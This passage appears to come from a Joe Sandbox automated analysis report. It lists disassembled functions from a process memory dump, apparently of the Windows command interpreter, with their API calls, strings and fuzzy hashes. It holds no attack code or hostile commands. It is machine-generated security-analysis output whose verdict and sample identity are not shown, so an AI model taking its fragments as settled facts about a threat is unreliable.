                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F064DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F0650F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F064DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00), ref: 00F06545
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F064DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06553
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Classes$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1047774138-3057340834
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d04692880a4ac3bcb48f8a4216e0c3815fc1e2f0ba15ad66f55b1369b7a0017
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8e4493a4786bca3bfa42040338cfd3214a70d9941e714aa3e95748cbce3baef6
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d04692880a4ac3bcb48f8a4216e0c3815fc1e2f0ba15ad66f55b1369b7a0017
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36314371E1471CCBDF18EBB998556AEB6F1AB48B10F24402EE102B72D1EEB55C01BF64
                                                                                                                                                                                                                                                                                                                                                      Function 00F05E03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00F0CCE0,0000001C,00F06931), ref: 00F05E32
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00F05EFB
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$CloseOpeniswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Classes$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2439148603-3057340834
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 65f5eb0bea00a56ab19a2e23e109aba4566172256398898d0d32523066908dbc
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1ab3d713f92db42258c796952799f4f98da8de1754d4a21c341abbef228ffb51
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65f5eb0bea00a56ab19a2e23e109aba4566172256398898d0d32523066908dbc
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4318631E146588BDB18EFB5C8556AEB6B1AB48B10F24402EE006B72D1EAB55D00BF54
                                                                                                                                                                                                                                                                                                                                                      Function 00F0B222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0B25E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 00F0B2D2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 00F0B30B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                      • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca5233ab27ec67437971933bfea7998ae1a547f7fe1d5d2320be777ec211ec74
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f8915dd5c63b97829645d6774a70f0da5ec7360555423502b35ab9a1b9e30f0b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca5233ab27ec67437971933bfea7998ae1a547f7fe1d5d2320be777ec211ec74
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9318271B0021DABDB15DBA9DC85BAEB7E8AF58350F040069A505E3281DB74DE44AB50
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4BAF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: /-Y$COPYCMD
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1886669725-617350906
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 667291096cadfc9c62fbcbf3edee0dee9c1b0efe0952ae240848ab2db077486c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ffa6c5320acc5a19c0549c8e9b07bc24dd17128ba4d2557845fb120342bd3b25
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 667291096cadfc9c62fbcbf3edee0dee9c1b0efe0952ae240848ab2db077486c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45216BF1B002199BDB289B199C457FBB6F5EFC4358F512059EA49F72C4EA70CD41E260
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9E8E: iswspace.MSVCRT ref: 00EE9E9E
                                                                                                                                                                                                                                                                                                                                                      • iswspace.MSVCRT ref: 00EE9E28
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00EE9E79
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswspace$_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: off
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3989682491-733764931
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 87f06de6e465de2bc3e286f79281686ea79b34929e17952cf8055e1189ad9c9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec8b8d26c0eb8965a9f4fe43ccd4c9fe9ba2ea859d96e5eebf623cf6eae9193f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87f06de6e465de2bc3e286f79281686ea79b34929e17952cf8055e1189ad9c9b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB112B717043DDA6DB34A26B6C1AB7A62D58B80B59B28202DFF07F60E3EA45CD41D1A1
                                                                                                                                                                                                                                                                                                                                                      Function 00F05166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00F05182
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: __iob_funcfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 620453056-2781220306
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 957041dcf2f7d1bf391460b771425fdaaf03d08d5d800f993ecaa062dad11938
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c5b7c1c79b095b7a7aaf94ae08e55db8e7435e7b56c07d234b38ce9630870e3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 957041dcf2f7d1bf391460b771425fdaaf03d08d5d800f993ecaa062dad11938
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC017B37E04B125AC7342B98A80AA63B354DBD0B34365052FEC5BA31C0F6E19D03B950
                                                                                                                                                                                                                                                                                                                                                      Function 00F03500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00F0351B
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00F0352C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-582119455
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4a19e2dc9e31ee62eff5accf65d0efe0f60407206345ee33292b0e54ba9b40e1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c6a950175a808b9bc2acdb0f2fd1150c2ccd772a8a0aa86b3d7f15764f614d8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a19e2dc9e31ee62eff5accf65d0efe0f60407206345ee33292b0e54ba9b40e1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2E09A32E0133D8BDF31AB35BD0996A3B98AB44F7470A1451F809E33A0D6608D02BED1
                                                                                                                                                                                                                                                                                                                                                      Function 00F038F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00F038FB
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00F03907
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-919018592
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3625d02a86266f8e9270f5a2ba1e5aef58f332f89b849fa66aee5f2c06aeaab8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c345b872ad5bda5f03419d5cb1e660a615ff75bff1270ec5df5b4cac5a5cb1c7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3625d02a86266f8e9270f5a2ba1e5aef58f332f89b849fa66aee5f2c06aeaab8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0E67294175D778B211FA2DC0DC4B7F19DB447B17005012F90992160CA75C921EE91
                                                                                                                                                                                                                                                                                                                                                      Function 00EF52F5 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF539E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 00EF54C6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$CurrentDirectory
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 168429351-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2e796988c111f9ed8d6fb1ed56332fc7549051a23c4b52260bce34f71e41f0a6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e3eea22e83baf1d1c4743661a9a0ea643ef5b4f144149ce817ac66caef2cb503
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e796988c111f9ed8d6fb1ed56332fc7549051a23c4b52260bce34f71e41f0a6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9619972A0C7459FD328CF28D88566BB7E5FF98310F10492EF69AD7290EB709944DB42
                                                                                                                                                                                                                                                                                                                                                      Function 00EEAA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3270668897-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8320f656e9f6adc405a21774ec963a1eb3f96b65c3906b6707da1ac90c5397fb
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7ee155717781f3a0fb624ad5fa14521b37aa0d033ba865c605b8d98d7b3014d4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8320f656e9f6adc405a21774ec963a1eb3f96b65c3906b6707da1ac90c5397fb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11518E3560065D9BCB24EF798D1167E73A5DF84708B38642DEA43B71C1EBB06E42D391
                                                                                                                                                                                                                                                                                                                                                      Function 00EEDED0 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3849470556-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d2755450ad2af0817215438178f9c888b0841cb87127a3935be5f4c948116aca
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e91c6497d577cf5a4ea28c6d95bd109101e186ab4b69f255b2750fee9fe788c2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2755450ad2af0817215438178f9c888b0841cb87127a3935be5f4c948116aca
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0511670A0824CCBCB24DF5ADC452BDB7B1FB84304F2551AAE902A7391E7B5DD42EB81
                                                                                                                                                                                                                                                                                                                                                      Function 00EF1CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
                                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
